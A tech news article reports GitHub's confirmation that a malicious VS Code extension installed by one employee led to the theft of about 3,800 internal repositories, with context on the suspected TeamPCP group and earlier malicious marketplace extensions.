GitHub Confirms Breach of 3,800 Internal Repositories After Employee Installs Malicious VS Code Extension
Table of Contents
A Single Plugin, Thousands of Repositories
GitHub has confirmed a significant security lapse after a single employee installed a malicious Visual Studio Code extension, leading to the compromise of roughly 3,800 internal repositories. The incident highlights a persistent and growing vulnerability in the developer ecosystem: the trust placed in third-party plugins within integrated development environments (IDEs).
The breach came to light after the TeamPCP hacker group posted on the Breached cybercrime forum, claiming they had acquired access to private GitHub source code. The group sought a minimum of $50,000 for the data, stating they were not interested in extorting GitHub directly but were looking for a single buyer before potentially leaking the data for free.
In an official statement, GitHub noted that it detected and contained the compromise of the employee’s device shortly after the activity was flagged. The company acted by removing the unnamed trojanized extension from the VS Code marketplace and isolating the affected endpoint to prevent further lateral movement within its network.
“Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only,” the company stated. “The attacker’s current claims of ~3,800 repositories are directionally consistent with our investigation so far.”
The TeamPCP Connection
While GitHub has not formally attributed the attack, the hallmarks of the breach align with the activities of TeamPCP. The group has a documented history of targeting developer platforms and supply chains, with previous campaigns hitting PyPI, NPM, and Docker. More recently, they were linked to the “Mini Shai-Hulud” campaign, which reportedly impacted employees at OpenAI.
The group’s strategy is rarely about traditional ransomware. Instead, they focus on high-value source code and credentials, leveraging the specialized tools developers use daily to bypass traditional perimeter security. By poisoning an extension—a tool that often requires deep permissions to read and write files within a project—attackers can effectively turn a developer’s own workstation into a gateway for data exfiltration.
The Marketplace Vulnerability
The VS Code Marketplace is the primary hub for add-ons that enhance Microsoft’s popular editor, but it has increasingly become a hunting ground for threat actors. This is not the first time the marketplace has been used as a delivery vector for malware. Over the last several years, multiple extensions with millions of downloads have been pulled after being found to contain credential stealers or cryptominers.
Last year, security researchers flagged a series of extensions posing as legitimate development tools that infected systems with the XMRig cryptominer. In other instances, threat actors like “WhiteCobra” flooded the marketplace with dozens of crypto-stealing plugins. More recently, in January, two AI-based coding assistants—boasting 1.5 million installs—were found to be exfiltrating developer system data to servers located in China.
Impact and Scope
GitHub has emphasized that there is currently no evidence that customer data stored outside the affected internal repositories has been compromised. For a platform that supports over 180 million developers and 90% of the Fortune 100, the distinction between “internal” and “customer” data is critical to maintaining trust.
However, the loss of nearly 4,000 internal repositories provides attackers with a blueprint of GitHub’s own inner workings. This could potentially be used to identify further vulnerabilities or craft more sophisticated social engineering attacks against GitHub employees in the future.
The incident serves as a stark reminder for DevOps and security teams that the “developer inner loop”—the tools used to write and test code—is often the weakest link in the software supply chain. As developers increasingly rely on AI-powered assistants and third-party plugins to speed up productivity, the surface area for these types of targeted attacks continues to expand.
